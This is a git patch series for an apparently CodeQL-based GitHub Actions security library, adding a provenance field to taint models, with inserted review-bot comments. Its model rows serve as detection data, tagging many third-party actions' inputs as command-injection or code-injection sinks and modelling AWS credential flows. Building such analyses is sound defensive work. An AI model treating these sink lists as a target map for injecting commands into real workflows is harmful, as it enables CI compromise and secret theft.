 private import codeql.actions.dataflow.ExternalFlow
-private import codeql.actions.Ast::Utils as Utils
 private import codeql.actions.security.ArtifactPoisoningQuery
 /**
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
index e66c8e7c1b95..36965166d3bc 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
@@ -6,7 +6,6 @@ private import actions
 private import codeql.util.Unit
 private import codeql.actions.DataFlow
 private import codeql.actions.dataflow.ExternalFlow
-private import codeql.actions.Ast::Utils as Utils
 private import codeql.actions.security.ArtifactPoisoningQuery
 /**
From c56f220b13d2dcf1c310035776369fc88d60a089 Mon Sep 17 00:00:00 2001
From: jorgectf
Date: Thu, 11 Apr 2024 11:23:28 +0200
Subject: [PATCH 160/707] Add provenance field
---
 .../codeql/actions/dataflow/ExternalFlow.qll | 23 +++++++++++--------
 .../internal/ExternalFlowExtensions.qll | 10 +++++---
 ql/test/library-tests/test.ql | 10 ++++----
 3 files changed, 27 insertions(+), 16 deletions(-)
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
index c1c93221d1af..cc7e4c633e31 100644
--- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
+++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
@@ -8,9 +8,10 @@ private import actions
 * - action: Fully-qualified action name (NWO)
 * - version: Either '*' or a specific SHA/Tag
 * - output arg: To node (prefixed with either `env.` or `output.`)
+ * - provenance: verification of the model
 */
-predicate sourceModel(string action, string version, string output, string kind) {
- Extensions::sourceModel(action, version, output, kind)
+predicate sourceModel(string action, string version, string output, string kind, string provenance) {
+ Extensions::sourceModel(action, version, output, kind, provenance)
 }
 /**
@@ -21,9 +22,12 @@ predicate sourceModel(string action, string version, string output, string kind)
 * - input arg: From node (prefixed with either `env.` or `input.`)
 * - output arg: To node (prefixed with either `env.` or `output.`)
 * - kind: Either 'Taint' or 'Value'
+ * - provenance: verification of the model
 */
-predicate summaryModel(string action, string version, string input, string output, string kind) {
- Extensions::summaryModel(action, version, input, output, kind)
+predicate summaryModel(
+ string action, string version, string input, string output, string kind, string provenance
+) {
+ Extensions::summaryModel(action, version, input, output, kind, provenance)
 }
 /**
@@ -33,14 +37,15 @@ predicate summaryModel(string action, string version, string input, string outpu
 * - version: Either '*' or a specific SHA/Tag
 * - input: sink node (prefixed with either `env.` or `input.`)
 * - kind: sink kind
+ * - provenance: verification of the model
 */
-predicate sinkModel(string action, string version, string input, string kind) {
- Extensions::sinkModel(action, version, input, kind)
+predicate sinkModel(string action, string version, string input, string kind, string provenance) {
+ Extensions::sinkModel(action, version, input, kind, provenance)
 }
 predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) {
 exists(Uses uses, string action, string version, string kind |
- sourceModel(action, version, fieldName, kind) and
+ sourceModel(action, version, fieldName, kind, _) and
 uses.getCallee() = action.toLowerCase() and
 (
 if version.trim() = "*"
@@ -63,7 +68,7 @@ predicate externallyDefinedStoreStep(
 DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c
 ) {
 exists(Uses uses, string action, string version, string input, string output |
- summaryModel(action, version, input, output, "taint") and
+ summaryModel(action, version, input, output, "taint", _) and
 c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and
 uses.getCallee() = action.toLowerCase() and
 (
@@ -85,7 +90,7 @@ predicate externallyDefinedStoreStep(
 predicate externallyDefinedSink(DataFlow::Node sink, string kind) {
 exists(Uses uses, string action, string version, string input |
- sinkModel(action, version, input, kind) and
+ sinkModel(action, version, input, kind, _) and
 uses.getCallee() = action.toLowerCase() and
 (
 if input.trim().matches("env.%")
diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
index 89cf4de02616..8e8ce10bba9f 100644
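Review bot: The new `provenance` column is discarded at every use site in this hunk — `externallyDefinedSource`, `externallyDefinedStoreStep` and `externallyDefinedSink` all bind it to `_` — so a model is trusted identically whatever its provenance, and nothing constrains the column's values (the data files later on this page only ever write `"manual"`). That is acceptable as a first step, but the doc line `* - provenance: verification of the model` does not tell a model author what to put there; I would document the vocabulary and the current effect, e.g. `* - provenance: how the model was obtained and whether it was reviewed, e.g. 'manual' for hand-written models; currently informational only and not used to select models`. If generated or imported models are added later, the `_` in these three predicates is where a provenance-based gate belongs, so a short `// provenance deliberately ignored for now` at each site would mark the intent. All three `externallyDefined*` predicates continue past the end of their hunks.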
--- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
@@ -5,16 +5,20 @@
 /**
 * Holds if a source model exists for the given parameters.
 */
-extensible predicate sourceModel(string action, string version, string output, string kind);
+extensible predicate sourceModel(
+ string action, string version, string output, string kind, string provenance
+);
 /**
 * Holds if a summary model exists for the given parameters.
 */
 extensible predicate summaryModel(
- string action, string version, string input, string output, string kind
+ string action, string version, string input, string output, string kind, string provenance
 );
 /**
 * Holds if a sink model exists for the given parameters.
 */
-extensible predicate sinkModel(string action, string version, string input, string kind);
+extensible predicate sinkModel(
+ string action, string version, string input, string kind, string provenance
+);
diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql
index 4ee330a44662..afe382fa4d93 100644
--- a/ql/test/library-tests/test.ql
+++ b/ql/test/library-tests/test.ql
@@ -49,12 +49,14 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() =
 query predicate scopes(Cfg::CfgScope c) { any() }
-query predicate sources(string action, string version, string output, string kind) {
- sourceModel(action, version, output, kind)
+query predicate sources(string action, string version, string output, string kind, string provenance) {
+ sourceModel(action, version, output, kind, provenance)
 }
-query predicate summaries(string action, string version, string input, string output, string kind) {
- summaryModel(action, version, input, output, kind)
+query predicate summaries(
+ string action, string version, string input, string output, string kind, string provenance
+) {
+ summaryModel(action, version, input, output, kind, provenance)
 }
 query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() }
From c373238fa61c58ebb80ba0442b155173f40fa18a Mon Sep 17 00:00:00 2001
From: jorgectf
Date: Thu, 11 Apr 2024 11:23:53 +0200
Subject: [PATCH 161/707] Add subfolders to `dataExtensions`
---
 ql/lib/qlpack.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 2b3896d0cf08..deb926bafff5 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -14,3 +14,4 @@ groups:
 - yaml
 dataExtensions:
 - ext/*.model.yml
+ - ext/**/*.model.yml
From 5a12a2213b091001439b04e356a199446a13da6b Mon Sep 17 00:00:00 2001
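Review bot: The added `ext/**/*.model.yml` glob most likely already covers files directly under `ext/` (if `**` is allowed to match zero directories, which the pack loader's semantics — not visible here — decide), in which case the existing `ext/*.model.yml` entry becomes redundant and every model file is matched twice; worth checking how duplicate matches are treated, or dropping the narrower entry. Separately, widening the glob means anything placed anywhere under `ext/` becomes trusted taint-model data for every consumer of the pack; `ext/TEST-RW-MODELS.model.yml`, with its `octo-org/*` placeholder actions, is already shipped by the flat glob, so a convention that keeps fixtures outside `ext/` (for example under `ql/test/`) would stop test models from being distributed as library data.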
From: jorgectf Date: Thu, 11 Apr 2024 11:24:42 +0200 Subject: [PATCH 162/707] Add provenance to existing models --- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ql/lib/ext/TEST-RW-MODELS.model.yml | 8 ++-- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 4 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 24 ++++++------ ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 10 ++--- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 8 ++-- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 4 +- .../aszc_change-string-case-action.model.yml | 6 +-- ...ctions_configure-aws-credentials.model.yml | 12 +++--- .../axel-op_googlejavaformat-action.model.yml | 4 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 6 +-- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 6 +-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 4 +- ql/lib/ext/cachix_cachix-action.model.yml | 6 +-- ql/lib/ext/changesets_action.model.yml | 4 +- .../ext/cloudflare_wrangler-action.model.yml | 4 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 6 +-- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- .../ext/dailydotdev_action-devcard.model.yml | 4 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 4 +- 
.../dawidd6_action-ansible-playbook.model.yml | 4 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 12 +++--- ...er-practice_actions-setup-docker.model.yml | 6 +-- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 8 ++-- ql/lib/ext/expo_expo-github-action.model.yml | 4 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 4 +- ...nzdiebold_github-env-vars-action.model.yml | 4 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 4 +- ql/lib/ext/game-ci_unity-builder.model.yml | 4 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ql/lib/ext/getsentry_action-release.model.yml | 4 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 4 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 8 ++-- .../ext/gradle_gradle-build-action.model.yml | 6 +-- ql/lib/ext/haya14busa_action-cond.model.yml | 4 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 8 ++-- ql/lib/ext/ilammy_setup-nasm.model.yml | 4 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 6 +-- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 12 +++--- .../ext/jitterbit_get-changed-files.model.yml | 14 +++---- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 6 +-- .../ext/jurplel_install-qt-action.model.yml | 12 +++--- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 8 ++-- ...han_pull-request-comment-trigger.model.yml | 4 +- 
...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 4 +- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 4 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 6 +-- .../manusa_actions-setup-minikube.model.yml | 8 ++-- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 14 +++---- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 4 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 22 +++++------ ql/lib/ext/msys2_setup-msys2.model.yml | 4 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 4 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +-- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 6 +-- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 6 +-- .../preactjs_compressed-size-action.model.yml | 4 +- ql/lib/ext/py-actions_flake8.model.yml | 14 +++---- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 8 ++-- ...vecircus_android-emulator-runner.model.yml | 38 +++++++++---------- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 16 ++++---- .../ext/renovatebot_github-action.model.yml | 10 ++--- .../ext/roots_issue-closer-action.model.yml | 4 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- 
...ction-detect-and-tag-new-version.model.yml | 4 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 10 ++--- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 8 ++-- ql/lib/ext/timheuer_base64-to-file.model.yml | 4 +- ql/lib/ext/tj-actions_branch-names.model.yml | 6 +-- ql/lib/ext/tj-actions_changed-files.model.yml | 34 ++++++++--------- .../tj-actions_verify-changed-files.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 8 ++-- ...ss_conventional-changelog-action.model.yml | 20 +++++----- .../tryghost_action-deploy-theme.model.yml | 4 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 8 ++-- .../ext/wearerequired_lint-action.model.yml | 6 +-- ql/lib/ext/webfactory_ssh-agent.model.yml | 6 +-- .../xt0rted_slash-command-action.model.yml | 4 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 8 ++-- ql/lib/ext/zaproxy_action-full-scan.model.yml | 8 ++-- 135 files changed, 359 insertions(+), 359 deletions(-) diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index e3d97adf69d4..67455900ec36 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"] \ No newline at end of file + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml index 4ff387b1c5ac..65952bccb35a 100644 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml 
+++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] - - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] + - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo"] + - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection"] + - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index cd409f38b59d..9b36680af8f0 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/github-script", "*", "input.script", "code-injection"] + - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index aabd5a3ce369..63e99abd4d35 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index ad65775e58d1..41b67c2a625d 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml 
@@ -3,19 +3,19 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.appdir", 
"command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 638ff4497353..f2b8c8549a90 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title"] + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index c632a3a1ff25..7cb2e10e9267 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"] - - ["anchore/sbom-action", "*", "input.format", "command-injection"] - - ["anchore/sbom-action", "*", "input.path", "command-injection"] - - ["anchore/sbom-action", "*", "input.file", "command-injection"] - - ["anchore/sbom-action", "*", "input.image", "command-injection"] + - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.path", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.file", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.image", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 26e5adea505b..83f09bc6bde5 100644 
--- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/scan-action", "*", "input.grype-version", "command-injection"] + - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index 2903888a7318..bdd8a8f77c9b 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.script", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.script", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 5ecd36f0926f..7e5f5c9ee6a4 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml 
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"]
+ - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"]
diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml
index b81f5c17ca22..8daa9a9c2b33 100644
--- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml
+++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"]
+ - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"]
diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml
index 21dcd22c8b7f..80502e487b83 100644
--- a/ql/lib/ext/asdf-vm_actions.model.yml
+++ b/ql/lib/ext/asdf-vm_actions.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["asdf-vm/actions", "*", "input.before_install", "command-injection"]
\ No newline at end of file
+ - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml
index 5ab9fee16679..2a26d31feac7 100644
--- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml
+++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml
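Review bot: The rewritten last row of ql/lib/ext/asdf-vm_actions.model.yml still carries `\ No newline at end of file` on the new side, so the file keeps its missing trailing newline even though the commit rewrites exactly that line. Since the row is being touched anyway, terminating it with a newline is free and keeps YAML linters and future one-line diffs quiet. The same applies in this batch to the cachix_cachix-action, crazy-max_ghaction-import-gpg, delaguardo_setup-clojure, determinatesystems_magic-nix-cache-action, docker_build-push-action, gabrielbb_xvfb-action, game-ci_unity-test-runner, gautamkrishnar_blog-post-workflow and gr2m_create-or-update-pull-request-action model files.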
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"]
+ - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml
index a6e1364d218c..82e81f558166 100644
--- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml
+++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"]
- - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"]
+ - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"]
+ - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml
index cfdbb0b825fb..58554eb3f612 100644
--- a/ql/lib/ext/aszc_change-string-case-action.model.yml
+++ b/ql/lib/ext/aszc_change-string-case-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"]
- - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint"]
- - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint"]
+ - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"]
+ - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"]
+ - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint", "manual"]
diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml
index 26b3a1fd3df6..ca99210b4c2a 100644
--- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml
+++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml
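Review bot: The two rows in aszc_change-string-case-action.model.yml that map `input.replace-with` to `output.uppercase` and `output.lowercase` look out of place: the same file's first row uses `input.string`, and `replace-with` is the input name used by the frabert/replace-string-action model later in this diff, which suggests a copy-and-paste carry-over. If the action does not declare a `replace-with` input, those two summaries never match and the uppercase/lowercase outputs are effectively unmodeled; confirm against the action's input list and, if so, change both rows to read `"input.string"`. The commit only appends the provenance column, so this is pre-existing, but these are the lines being rewritten.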
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"]
- - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint"]
- - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint"]
- - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint"]
- - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint"]
- - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint"]
